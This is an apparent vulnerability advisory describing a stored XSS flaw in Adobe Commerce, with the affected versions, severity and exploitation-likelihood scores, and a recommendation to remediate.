A high‑privileged attacker can inject malicious JavaScript into vulnerable form fields of Adobe Commerce, resulting in a stored XSS vulnerability. Once a victim views the page containing the injected script, the code is executed in the victim’s browser, allowing the attacker to hijack the session and potentially increase confidentiality and integrity impact to high. The vulnerability is a classic CWE‑79 stored XSS flaw, with the attacker able to abuse the stored data to execute arbitrary JavaScript.

Adobe Commerce versions 2.4.9‑alpha3, 2.4.8‑p3, 2.4.7‑p8, 2.4.6‑p13, 2.4.5‑p15, 2.4.4‑p16 and any earlier release are affected. The vulnerability applies to all CPE strings associated with the affected Commerce and Magento products listed in the data, including both commercial and open‑source editions.

The CVSS score of 8.1 indicates a high severity, but the EPSS score of less than 1% and the fact that the issue is not listed in the KEV catalog suggest a relatively low likelihood of widespread exploitation. Exploitation requires user interaction; a victim must visit the page with the vulnerable field for the script to execute. If the vulnerability is abused by an attacker with high privileges, the impact can be severe, providing session takeover and compromising confidential data. Therefore, even though the probability of exploitation is low, the potential damage warrants immediate attention and remediation.